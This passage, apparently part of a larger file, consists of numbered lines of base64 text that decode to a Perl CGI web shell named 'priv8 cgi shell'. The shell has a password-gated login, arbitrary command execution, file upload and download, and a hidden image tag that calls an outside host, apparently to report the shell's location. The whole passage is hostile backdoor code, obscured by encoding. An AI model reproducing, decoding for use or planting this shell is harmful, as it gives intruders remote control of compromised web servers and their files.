  1585. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
  1586. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
  1587. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
  1588. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
  1589. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
  1590. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
  1591. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
  1592. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
  1593. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
  1594. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
  1595. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
  1596. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
  1597. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
  1598. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
  1599. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
  1600. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
  1601. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
  1602. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
  1603. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
  1604. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
  1605. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
  1606. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
  1607. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
  1608. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1609. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
  1610. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
  1611. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1612. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
  1613. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
  1614. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
  1615. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
  1616. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
  1617. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
  1618. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
  1619. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
  1620. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
  1621. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
  1622. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
  1623. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
  1624. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
  1625. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
  1626. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
  1627. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
  1628. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
  1629. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
  1630. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
  1631. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
  1632. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
  1633. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
  1634. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
  1635. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
  1636. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1637. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
  1638. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1639. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
  1640. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
  1641. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
  1642. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
  1643. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
  1644. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
  1645. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1646. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
  1647. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1648. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1649. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
  1650. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
  1651. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1652. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
  1653. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1654. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1655. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
  1656. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
  1657. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
  1658. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
  1659. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
  1660. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
  1661. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
  1662. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1663. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
  1664. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1665. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
  1666. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1667. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1668. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
  1669. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
  1670. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1671. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
  1672. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
  1673. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
  1674. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1675. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
  1676. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1677. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1678. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
  1679. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
  1680. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1681. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
  1682. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1683. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
  1684. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
  1685. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
  1686. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
  1687. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1688. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
  1689. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
  1690. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
  1691. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
  1692. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
  1693. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1694. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
  1695. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
  1696. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
  1697. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
  1698. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
  1699. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
  1700. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
  1701. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
  1702. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1703. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
  1704. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1705. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
  1706. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1707. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
  1708. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
  1709. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
  1710. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1711. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
  1712. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1713. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1714. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
  1715. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1716. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
  1717. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
  1718. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
  1719. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
  1720. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1721. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
  1722. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
  1723. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
  1724. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1725. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1726. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
  1727. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1728. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
  1729. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
  1730. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
  1731. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
  1732. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
  1733. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
  1734. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
  1735. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
  1736. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
  1737. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
  1738. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1739. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1740. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
  1741. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
  1742. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
  1743. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
  1744. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1745. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
  1746. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
  1747. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
  1748. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
  1749. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
  1750. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1751. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
  1752. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
  1753. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
  1754. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
  1755. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
  1756. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
  1757. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
  1758. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
  1759. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1760. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
  1761. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
  1762. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
  1763. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
  1764. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
  1765. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
  1766. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
  1767. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
  1768. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
  1769. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1770. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
  1771. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
  1772. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
  1773. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
  1774. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
